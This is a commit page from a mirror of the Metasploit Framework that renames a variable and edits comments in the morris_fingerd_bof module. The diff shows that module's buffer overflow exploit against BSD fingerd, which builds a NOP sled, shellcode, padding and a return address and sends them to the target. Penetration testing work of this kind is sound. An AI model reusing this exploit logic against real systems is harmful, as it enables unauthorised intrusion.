infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Explain "junk" in buffer for morris_fingerd_bof 

And unrelated whitespace changes because I suck.
GSoC/Meterpreter_Web_Console
William Vu 2018-11-22 23:10:57 -06:00
parent f2f5b3c8fa
commit 8a402da056
1 changed files with 4 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/exploits/bsd/finger/morris_fingerd_bof.rb
View File

@ -85,24 +85,23 @@ class MetasploitModule < Msf::Exploit::Remote
# 0x01 is NOP in VAX-speak # 0x01 is NOP in VAX-speak
nops = "\x01" * (target.payload_space - shellcode.length) nops = "\x01" * (target.payload_space - shellcode.length)
# This overwrites part of the buffer # This pads past buffer corruption
junk = rand_text_alphanumeric(109) padding = rand_text_alphanumeric(109)
# This zeroes out part of the stack frame # This zeroes out part of the stack frame
frame = "\x00" * 16 frame = "\x00" * 16
# Finally, pack in our return address # Finally, pack in our return address
ret = [target.ret].pack('V') # V is for VAX! ret = [target.ret].pack('V') # V is for VAX!
# The newline is for gets(3) # The newline is for gets(3)
sploit = nops + shellcode + junk + frame + ret + "\n" sploit = nops + shellcode + padding + frame + ret + "\n"
# Fire away # Fire away
print_status('Connecting to fingerd') print_status('Connecting to fingerd')
connect connect
print_status("Sending #{sploit.length}-byte buffer") print_status("Sending #{sploit.length}-byte buffer")
sock.put(sploit) sock.put(sploit)
# Hat tip @bcoles # Hat tip @bcoles
rescue Rex::ConnectionError => e rescue Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message) fail_with(Failure::Unreachable, e.message)